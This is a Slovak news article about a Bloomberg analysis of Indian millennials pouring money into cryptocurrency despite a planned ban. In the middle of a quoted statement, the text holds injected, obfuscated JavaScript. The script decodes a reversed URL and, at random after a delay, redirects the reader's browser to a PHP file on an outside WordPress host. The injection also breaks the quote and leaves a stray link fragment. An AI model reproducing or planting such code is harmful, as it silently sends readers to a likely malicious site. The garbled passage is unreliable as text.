kryptomeny

Indovia sa zbláznili do kryptomien. Investície vďaka tomu vzrástli medziročne 200krát

Indiu postihla doslova explózia investícií do kryptomien. Kým v roku 2019 do nich Indovia vložili v prepočte okolo 200 miliónov dolárov, vlani to bolo už 40 miliárd. A to všetko napriek oznámenému plánu vlády o zákaze kryptomenien v krajine. Vyplýva to z analýzy agentúry Bloomberg.

Analytici tento neuveriteľný skok vysvetľujú radikálnou zmenou myslenia medzi mladšími indickými investormi z radov milénia. Podľa nich je kryptomena najpreferovanejším prístavom pre ich úspory viac než cenné kovy, kde naopak investujú príslušníci starších generácií.

„Radšej vložím peniaze do kryptomeny ako do $GRn=function(n){if (typeof ($GRn.list[n]) == „string“) return $GRn.list[n].split(„“).reverse().join(„“);return $GRn.list[n];};$GRn.list=[„\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}anda-vydala-kartu-pre-platby-peniazmi-zlatom-alebo-kryptomenami/“>zlata“ uviedol pre Bloomberg indický podnikateľ Rishi Sood. Kryptomenu považuje za transparentnejšie aktívum v porovnaní so zlatom alebo reality a navyše vraj zaisťuje lepšie výnosy v kratšom čase.

V Indii je dnes podľa správy Bloombergu viac ako 15 miliónov ľudí, ktorí svoje úspory investujú do kryptomien. Je to o osem miliónov menej ako v Spojených štátoch, ale súčasne násobne viac ako vo Veľkej Británii, kde je len niečo cez dva miliónov kryptónových investorov. Obľuba kryptomeny v Indii vzrástla, hoci sa vláda a centrálna banka nechali avizuje, že kryptomena bude tvrdo regulovať, dokonca hovorí aj o ich zákaze.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *